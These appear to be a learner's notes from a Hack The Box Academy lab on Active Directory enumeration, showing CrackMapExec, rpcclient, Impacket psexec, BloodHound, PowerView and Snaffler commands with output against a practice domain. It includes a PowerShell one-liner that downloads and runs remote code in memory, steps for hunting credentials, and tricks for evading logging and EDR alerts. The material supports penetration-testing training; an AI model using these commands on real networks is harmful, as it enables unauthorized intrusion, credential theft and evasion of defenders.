🐇Deeper Down the Rabbit Hole

Enumerating Security Controls

After gaining a foothold, we could use this access to get a feeling for the defensive state of the hosts, enumerate the domain further now that our visibility is not as restricted, and, if necessary, work at "living off the land" by using tools that exist natively on the hosts.

Windows Defender

We can use the built-in PowerShell cmdlet Get-MpComputerStatus to get the current Defender status. Here, we can see that the RealTimeProtectionEnabled parameter is set to True, which means Defender is enabled on the system.

PS C:\htb> Get-MpComputerStatus

AMEngineVersion                 : 1.1.17400.5
AMProductVersion                : 4.10.14393.0
AMServiceEnabled                : True
AMServiceVersion                : 4.10.14393.0
AntispywareEnabled              : True
AntispywareSignatureAge         : 1
AntispywareSignatureLastUpdated : 9/2/2020 11:31:50 AM
AntispywareSignatureVersion     : 1.323.392.0
[...]
OnAccessProtectionEnabled       : False
QuickScanAge                    : 0
QuickScanEndTime                : 9/3/2020 12:50:45 AM
QuickScanStartTime              : 9/3/2020 12:49:49 AM
RealTimeProtectionEnabled       : True
[...]

Credentialed Enumeration - from Linux

We are interested in information about domain user and computer attributes, group membership, Group Policy Objects, permissions, ACLs, trusts, and more.

CrackMapExec

CME offers a help menu for each protocol (i.e., crackmapexec winrm -h / crackmapexec smb -h, etc.).

We still have some few flags that we are very interested in are:

-u Username The user whose credentials we will use to authenticate
-p Password User's password
Target (IP or FQDN) Target host to enumerate (in our case, the Domain Controller)
--users Specifies to enumerate Domain Users
--groups Specifies to enumerate domain groups
--loggedon-users Attempts to enumerate what users are logged on to a target, if any

CME - Domain User Enumeration

ElFelixio@htb[/htb]$ sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated domain user(s)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\administrator                  badpwdcount: 0 baddpwdtime: 2022-03-29 12:29:14.476567
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\guest                          badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\avazquez                       badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.903395

This command is very useful since it showcases the badpwdcount parameter, We could build a target user list filtering out any users with their badPwdCount attribute above 0 to be extra careful not to lock any accounts out.

CME - Domain Group Enumeration

ElFelixio@htb[/htb]$ sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated domain group(s)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Administrators                           membercount: 3
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Users                                    membercount: 4
[...]

CME - Logged On Users

ElFelixio@htb[/htb]$ sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-users

SMB         172.16.5.130    445    ACADEMY-EA-FILE  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-FILE) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB         172.16.5.130    445    ACADEMY-EA-FILE  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 (Pwn3d!)
SMB         172.16.5.130    445    ACADEMY-EA-FILE  [+] Enumerated loggedon users
SMB         172.16.5.130    445    ACADEMY-EA-FILE  INLANEFREIGHT\clusteragent              logon_server: ACADEMY-EA-DC01
SMB         172.16.5.130    445    ACADEMY-EA-FILE  INLANEFREIGHT\lab_adm                   logon_server: ACADEMY-EA-DC01
[...]

We see that many users are logged into this server which is very interesting.

CME Share Searching

It's good to enumerate available shares on the remote host and the level of access our user account has to each share (READ or WRITE access).

ElFelixio@htb[/htb]$ sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated shares
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Share           Permissions     Remark
SMB         172.16.5.5      445    ACADEMY-EA-DC01  -----           -----------     ------
SMB         172.16.5.5      445    ACADEMY-EA-DC01  ADMIN$                          Remote Admin
SMB         172.16.5.5      445    ACADEMY-EA-DC01  C$                              Default share
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Department Shares READ            
SMB         172.16.5.5      445    ACADEMY-EA-DC01  IPC$            READ            Remote IPC
[...]

The module spider_plus will dig through each readable share on the host and list all readable files.

ElFelixio@htb[/htb]$ sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 
SPIDER_P... 172.16.5.5      445    ACADEMY-EA-DC01  [*] Started spidering plus with option:
SPIDER_P... 172.16.5.5      445    ACADEMY-EA-DC01  [*]        DIR: ['print$']
SPIDER_P... 172.16.5.5      445    ACADEMY-EA-DC01  [*]        EXT: ['ico', 'lnk']

When completed, CME writes the results to a JSON file located at /tmp/cme_spider_plus/<ip of host>

SMBMap

SMBMap is great for enumerating SMB shares from a Linux attack host

SMBMap To Check Access

ElFelixio@htb[/htb]$ smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5

[+] IP: 172.16.5.5:445	Name: inlanefreight.local                               
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	Department Shares                                 	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
[...]

Recursive List Of All Directories

ElFelixio@htb[/htb]$ smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-only

rpcclient

It can enumerate, add, change, and even remove objects from AD, we can perform authenticated or unauthenticated enumeration using rpcclient

An example of using rpcclient from an unauthenticated standpoint would be:

rpcclient -U "" -N 172.16.5.5

rpcclient Enumeration

Now we are going to talk about the Relative Identifier (RID) utilized by Windows to track and identify objects

Here's how it works ->

The SID for the INLANEFREIGHT.LOCAL domain is: S-1-5-21-3842939050-3880317879-2865463114.
When an object is created within a domain, the number above (SID) will be combined with a RID to make a unique value used to represent the object.
So the domain user htb-student with a RID:[0x457] Hex 0x457 would = decimal 1111, will have a full user SID of: S-1-5-21-3842939050-3880317879-2865463114-1111.

RPCClient User Enumeration By RID

The RID is a decimal value that needs to be converted in HEX for this to work (Hex 0x457 would = decimal 1111)

rpcclient $> queryuser 0x457

        User Name   :   htb-student
        Full Name   :   Htb Student
        [...]

If we wished to enumerate all users to gather the RIDs for more than just one, we would use the enumdomusers command.

rpcclient $> enumdomusers

user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[lab_adm] rid:[0x3e9]
user:[htb-student] rid:[0x457]

Impacket Toolkit

Psexec.py

The tool creates a remote service by uploading a randomly-named executable to the ADMIN$ share on the target host. It then registers the service via RPC and the Windows Service Control Manager. Once established, communication happens over a named pipe, providing an interactive remote shell as SYSTEM on the victim host.

To connect to a host with psexec.py, we need credentials for a user with local administrator privileges.

psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125

wmiexec.py

Wmiexec.py utilizes a semi-interactive shell where commands are executed through Windows Management Instrumentation, this is a more stealthy approach to execution on hosts than other tools, but would still likely be caught by most modern anti-virus and EDR systems.

wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5

Windapsearch

Windapsearch is a Python script we can use to enumerate users, groups, and computers from a Windows domain by utilizing LDAP queries

The --da (enumerate domain admins group members ) option and the -PU ( find privileged users) options. The -PU option is interesting because it will perform a recursive search for users with nested group membership.

Windapsearch - Domain Admins

ElFelixio@htb[/htb]$ python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da

[+] Using Domain Controller at: 172.16.5.5
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=INLANEFREIGHT,DC=LOCAL
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 u:INLANEFREIGHT\forend
[+] Attempting to enumerate all Domain Admins
[+] Using DN: CN=Domain Admins,CN=Users.CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
[+]	Found 28 Domain Admins:

cn: Administrator
userPrincipalName: administrator@inlanefreight.local

cn: lab_adm

cn: Matthew Morgan
userPrincipalName: mmorgan@inlanefreight.local

it enumerated 28 users from the Domain Admins group.

we can run the tool with the -PU flag and check for users with elevated privileges that may have gone unnoticed. This is a great check for reporting since it will most likely inform the customer of users with excess privileges from nested group membership.

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU

Bloodhound.py

It creates graphical representations or "attack paths" of where access with a particular user may lead

Executing BloodHound.py

sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all

Once the script finishes, we will see the output files in the current working directory in the format of <date_object.json>.

Upload the Zip File into the BloodHound GUI

First we need to type sudo neo4j start to start the neo4j service

Next, we can type bloodhound from our Linux attack host

We can either upload each JSON file one by one or zip them first with a command such as zip -r ilfreight_bh.zip *.json and upload the Zip file.

To upload the files ->

Now that the data is loaded, we can use the Analysis tab to run queries against the database. There are many great cheat sheets to help us here.

Searching for Relationships

The query chosen to produce the map above was Find Shortest Paths To Domain AdminsThis will be extremely helpful when planning our next steps for lateral movement through the network.

Practical example

First i start by connecting through RPC with a null session and enumerate users

What AD User has a RID equal to Decimal 1170?

Now i need to find the hex value that i'm looking for:

We can now look for him:

queryuser 0x492

And to find the membercount: of the "Interns" group?

We just need to grep out what we look for

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups | grep Interns

Credentialed Enumeration - from Windows

In this section we are going to use some tools such as SharpHound/BloodHound, PowerView/SharpView, Grouper2, Snaffler, and some built-in tools useful for AD enumeration.

ActiveDirectory PowerShell Module

The ActiveDirectory PowerShell module is a group of PowerShell cmdlets for administering an Active Directory environment from the command line. there are 147 different cmdlets at the time of writing

The Get-Module cmdlet will list all available modules. This is a great way to see if anything like Git or custom administrator scripts are installed. If the module is not loaded, run Import-Module ActiveDirectory to load it for use.

Discover Modules

PS C:\htb> Get-Module

ModuleType Version    Name                                ExportedCommands
---------- -------    ----                                ----------------
Manifest   3.1.0.0    Microsoft.PowerShell.Utility        {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script     2.0.0      PSReadline                          {Get-PSReadLineKeyHandler, Get-PSReadLineOption, Remove-PS...

Load ActiveDirectory Module

PS C:\htb> Import-Module ActiveDirectory
PS C:\htb> Get-Module

ModuleType Version    Name                                ExportedCommands
---------- -------    ----                                ----------------
Manifest   1.0.1.0    ActiveDirectory                     {Add-ADCentralAccessPolicyMember, Add-ADComputerServiceAcc...
Manifest   3.1.0.0    Microsoft.PowerShell.Utility        {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script     2.0.0      PSReadline                          {Get-PSReadLineKeyHandler, Get-PSReadLineOption, Remove-PS...

Get Domain Info

PS C:\htb> Get-ADDomain

AllowedDNSSuffixes                 : {}
ChildDomains                       : {LOGISTICS.INLANEFREIGHT.LOCAL}
ComputersContainer                 : CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
[...]

Get-ADUser

This will get us a listing of accounts that may be susceptible to a Kerberoasting attack

PS C:\htb> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Checking For Trust Relationships

PS C:\htb> Get-ADTrust -Filter *

Direction               : BiDirectional
DisallowTransivity      : False
DistinguishedName       : CN=LOGISTICS.INLANEFREIGHT.LOCAL,CN=System,DC=INLANEFREIGHT,DC=LOCAL
[...]

This will be useful later on when looking to take advantage of child-to-parent trust relationships and attacking across forest trusts.

Group Enumeration

PS C:\htb> Get-ADGroup -Filter * | select name

And to get more detailed information about a particular group ->

Get-ADGroup -Identity "Backup Operators"

Now we can get even more specific by getting a member listing using the Get-ADGroupMember cmdlet.

PS C:\htb> Get-ADGroupMember -Identity "Backup Operators"

distinguishedName : CN=BACKUPAGENT,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
name              : BACKUPAGENT
objectClass       : user
objectGUID        : 2ec53e98-3a64-4706-be23-1d824ff61bed
SamAccountName    : backupagent
SID               : S-1-5-21-3842939050-3880317879-2865463114-5220

We can see that one account, backupagent, belongs to this group.

PowerView

Useful documentation about Powerview: Active Directory PowerView module

Some useful cmdlets:

Command

Description

Export-PowerViewCSV

Append results to a CSV file

ConvertTo-SID

Convert a User or group name to its SID value

Get-DomainSPNTicket

Requests the Kerberos ticket for a specified Service Principal Name (SPN) account

Domain/LDAP Functions:

Get-Domain

Will return the AD object for the current (or specified) domain

Get-DomainController

Return a list of the Domain Controllers for the specified domain

Get-DomainUser

Will return all users or specific user objects in AD

Get-DomainComputer

Will return all computers or specific computer objects in AD

Get-DomainGroup

Will return all groups or specific group objects in AD

Get-DomainOU

Search for all or specific OU objects in AD

Find-InterestingDomainAcl

Finds object ACLs in the domain with modification rights set to non-built in objects

Get-DomainGroupMember

Will return the members of a specific domain group

Get-DomainFileServer

Returns a list of servers likely functioning as file servers

Get-DomainDFSShare

Returns a list of all distributed file systems for the current (or specified) domain

GPO Functions:

Get-DomainGPO

Will return all GPOs or specific GPO objects in AD

Get-DomainPolicy

Returns the default domain policy or the domain controller policy for the current domain

Computer Enumeration Functions:

Get-NetLocalGroup

Enumerates local groups on the local or a remote machine

Get-NetLocalGroupMember

Enumerates members of a specific local group

Get-NetShare

Returns open shares on the local (or a remote) machine

Get-NetSession

Will return session information for the local (or a remote) machine

Test-AdminAccess

Tests if the current user has administrative access to the local (or a remote) machine

Threaded 'Meta'-Functions:

Find-DomainUserLocation

Finds machines where specific users are logged in

Find-DomainShare

Finds reachable shares on domain machines

Find-InterestingDomainShareFile

Searches for files matching specific criteria on readable shares in the domain

Find-LocalAdminAccess

Find machines on the local domain where the current user has local administrator access

Domain Trust Functions:

Get-DomainTrust

Returns domain trusts for the current domain or a specified domain

Get-ForestTrust

Returns all forest trusts for the current forest or a specified forest

Get-DomainForeignUser

Enumerates users who are in groups outside of the user's domain

Get-DomainForeignGroupMember

Enumerates groups with users outside of the group's domain and returns each foreign member

Get-DomainTrustMapping

Will enumerate all trusts for the current domain and any others seen.

Domain User Information

If we want to grab information about a specific user, mmorgan

Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol

Recursive Group Membership

I we want to recursivly find any groups that are part of a target group (nested group membership) to list out the members of those groups. For example, the output below shows that the Secadmins group is part of the Domain Admins group through nested group membership.

PS C:\htb>  Get-DomainGroupMember -Identity "Domain Admins" -Recurse

GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : svc_qualys
MemberDistinguishedName : CN=svc_qualys,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3842939050-3880317879-2865463114-5613

GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : sp-admin
MemberDistinguishedName : CN=Sharepoint Admin,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3842939050-3880317879-2865463114-5228

GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Secadmins
GroupDistinguishedName  : CN=Secadmins,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : spong1990
MemberDistinguishedName : CN=Maggie
                          Jablonski,OU=Operations,OU=Logistics-HK,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3842939050-3880317879-2865463114-1965

This could later help for potential elevation of privileges

Trust Enumeration

PS C:\htb> Get-DomainTrustMapping

Testing for Local Admin Access

PS C:\htb> Test-AdminAccess -ComputerName ACADEMY-EA-MS01

Finding Users With SPN Set

PS C:\htb> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName

SharpView

Let's use SharView to enumerate information about a specific user, such as the user forend

PS C:\htb> .\SharpView.exe Get-DomainUser -Identity forend

[Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
[Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=forend)))
objectsid                      : {S-1-5-21-3842939050-3880317879-2865463114-5614}
samaccounttype                 : USER_OBJECT
objectguid                     : 53264142-082a-4cb8-8714-8158b4974f3b
useraccountcontrol             : NORMAL_ACCOUNT
[...]

Snaffler

Snaffler is a tool that can help us acquire credentials or other sensitive data in an Active Directory environment.

It's used the following way:

Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data

We may find passwords, SSH keys, configuration files, or other data that can be used to further our access.

BloodHound

We'll start by running the SharpHound.exe collector

PS C:\htb> .\SharpHound.exe -c All --zipfilename ILFREIGHT

Next, we can exfiltrate the dataset to our own VM or ingest it into the BloodHound GUI tool

Practical Example

Using Bloodhound, determine how many Kerberoastable accounts exist within the INLANEFREIGHT domain. (Submit the number as the answer)

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

What PowerView function allows us to test if a user has administrative access to a local or remote host?

Run Snaffler and hunt for a readable web config file. What is the name of the user in the connection string within the file?

What is the password for the database user?

Living Off the Land

To enumerate the host and the network we're on, here are some basic commands:

hostname

Prints the PC's Name

[System.Environment]::OSVersion.Version

Prints out the OS version and revision level

wmic qfe get Caption,Description,HotFixID,InstalledOn

Prints the patches and hotfixes applied to the host

ipconfig /all

Prints out network adapter state and configurations

set

Displays a list of environment variables for the current session (ran from CMD-prompt)

echo %USERDOMAIN%

Displays the domain name to which the host belongs (ran from CMD-prompt)

echo %logonserver%

Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)

The systeminfo command is a nice one to run if we want to know a lot about our host without triggering to much logs

Here are some quick powershell cmdlets that we can use for our recon:

Get-Module

Lists available modules loaded for use.

Get-ExecutionPolicy -List

Will print the execution policy settings for each scope on a host.

Set-ExecutionPolicy Bypass -Scope Process

This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.

Get-ChildItem Env: | ft Key,Value

Return environment values such as key paths, users, computer information, etc.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

This is a quick and easy way to download a file from the web using PowerShell and call it from memory.

Downgrade Powershell

It's very good to know that several versions of PowerShell often exist on a host, if we are able to downgrade , our actions from the shell will not be logged in Event Viewer. This is a great way for us to remain under the defenders' radar while still utilizing resources built into the hosts to our advantage.

Let's try this out:

PS C:\htb> Get-host

Name             : ConsoleHost
Version          : 5.1.19041.1320
[...]

PS C:\htb> powershell.exe -version 2
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\htb> Get-host
Name             : ConsoleHost
Version          : 2.0
[...]

Firewall Checks

PS C:\htb> netsh advfirewall show allprofiles

Windows Defender Check (from CMD.exe)

C:\htb> sc query windefend

Using qwinsta to check if you're alone on the host:

PS C:\htb> qwinsta

 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
>console           forend                    1  Active
 rdp-tcp                                 65536  Listen

Network enumeration:

arp -a

Lists all known hosts stored in the arp table.

ipconfig /all

Prints out adapter settings for the host. We can figure out the network segment from here.

route print

Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.

netsh advfirewall show state

Displays the status of the host's firewall. We can determine if it is active and filtering traffic.

WMI

Windows Management Instrumentation (WMI) is a scripting engine that is widely used within Windows enterprise environments to retrieve information and run administrative tasks on local and remote hosts. Here are some useful commands you should know:

wmic qfe get Caption,Description,HotFixID,InstalledOn

Prints the patch level and description of the Hotfixes applied

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List

Displays basic host information to include any attributes within the list

wmic process list /format:list

A listing of all processes on host

wmic ntdomain list /format:list

Displays information about the Domain and Domain Controllers

wmic useraccount list /format:list

Displays information about all local accounts and any domain accounts that have logged into the device

wmic group list /format:list

Information about all local groups

wmic sysaccount list /format:list

Dumps information about any system accounts that are being used as service accounts.

Net Commands

Net commands can be beneficial to us when attempting to enumerate information from the domain.

It's good to know that net.exe commands are typically monitored by EDR solutions and can quickly give up our location. But if we don't care about being evasive, here are some commands:

net accounts

Information about password requirements

net accounts /domain

Password and lockout policy

net group /domain

Information about domain groups

net group "Domain Admins" /domain

List users with domain admin privileges

net group "domain computers" /domain

List of PCs connected to the domain

net group "Domain Controllers" /domain

List PC accounts of domains controllers

net group <domain_group_name> /domain

User that belongs to the group

net groups /domain

List of domain groups

net localgroup

All available groups

net localgroup administrators /domain

List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)

net localgroup Administrators

Information about a group (admins)

net localgroup administrators [username] /add

Add user to administrators

net share

Check current shares

net user <ACCOUNT_NAME> /domain

Get information about a user within the domain

net user /domain

List all users of the domain

net user %username%

Information about the current user

net use x: \computer\share

Mount the share locally

net view

Get a list of computers

net view /all /domain[:domainname]

Shares on the domains

net view \computer /ALL

List shares of a computer

net view /domain

List of PCs of the domain

If there is a network defender up, you can trick & bypass it but using net1 command rather than net. It will do the same thing and will not trigger a net string alert

Dsquery

Dsquery is a helpful command-line tool that can be utilized to find Active Directory objects. By default, the dsquery dll can be found at C:\Windows\System32\dsquery.dll.

User search

PS C:\htb> dsquery user

Computer search

PS C:\htb> dsquery computer

Wildcard Search

to view all objects in an OU, for example.

PS C:\htb> dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

Users With Specific Attributes Set (PASSWD_NOTREQD)

PS C:\htb> dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

  distinguishedName                                                                              userAccountControl
  CN=Guest,CN=Users,DC=INLANEFREIGHT,DC=LOCAL                                                    66082
  CN=Marion Lowe,OU=HelpDesk,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL      66080
  CN=Yolanda Groce,OU=HelpDesk,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL    66080
  CN=Eileen Hamilton,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL    66080
  CN=Jessica Ramsey,CN=Users,DC=INLANEFREIGHT,DC=LOCAL                                           546
  CN=NAGIOSAGENT,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL                           544
  CN=LOGISTICS$,CN=Users,DC=INLANEFREIGHT,DC=LOCAL                                               2080
  CN=FREIGHTLOGISTIC$,CN=Users,DC=INLANEFREIGHT,DC=LOCAL                                         2080

It's good to know the UAC Values

PreviousSpray Responsibly NextKerberoasting

Last updated 23 days ago